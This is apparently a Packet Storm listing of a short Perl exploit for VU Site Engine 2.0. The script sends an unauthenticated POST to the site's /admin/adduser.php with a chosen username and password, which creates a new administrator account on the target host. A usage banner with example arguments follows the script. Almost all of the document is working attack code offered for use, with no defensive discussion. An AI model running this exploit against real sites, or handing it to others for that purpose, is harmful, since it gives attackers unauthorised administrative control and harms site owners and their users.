Simple perl exploit that makes use of a flaw in VU Site Engine version 2.0 that allows for unauthenticated addition of administrative users.
751a8d15d2ce78414266b46272df811caa502e9ce0cffa142b10fdaf54664d81#!/usr/bin/perl
use IO::Socket;
# VU Site Engine v. 2.0 add new admin exploit
# Bug found GeW (http://www.security.nitro.ru)
# Exploit coded by Censored - SV
#--------------------------------------------
# Search Vulnerabilities // www.svt.nukleon.us
if (@ARGV < 3) { &usage; }
$host=$ARGV[0];
$new_admin = $ARGV[1];
$pass = $ARGV[2];
$host =~ s/(http:\/\/)//eg;
print "[~] Connect to $host\n";
$bug="/admin/adduser.php?logged_user=3&usern=$new_admin&pass=$pass&type=2&used=1";
$socket=IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Can't connect to $host\n";
print "[+] Connect, one moment\n";
print $socket "POST $bug HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print "[~] On $host add new admin\n";
print "[+] nick: $new_admin\n";
print "[+] pass: $pass\n";
sub usage ()
{ print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
VU Site Engine v. 2.0 add new admin exploit
----------------------------------------------
E.G.
sv-VUSite.pl www.bla.com Hats hats
Usage:
perl sv-VUSite.pl [host] [admin nick] [pass]
Params:
[host] - vulnerabilities Host
[admin nick] - new admin nick
[pass] - pass for new admin
----------------------------------------------
Coded by Censored
Search vulnerabilities // www.svt.nukleon.us
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
exit();
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed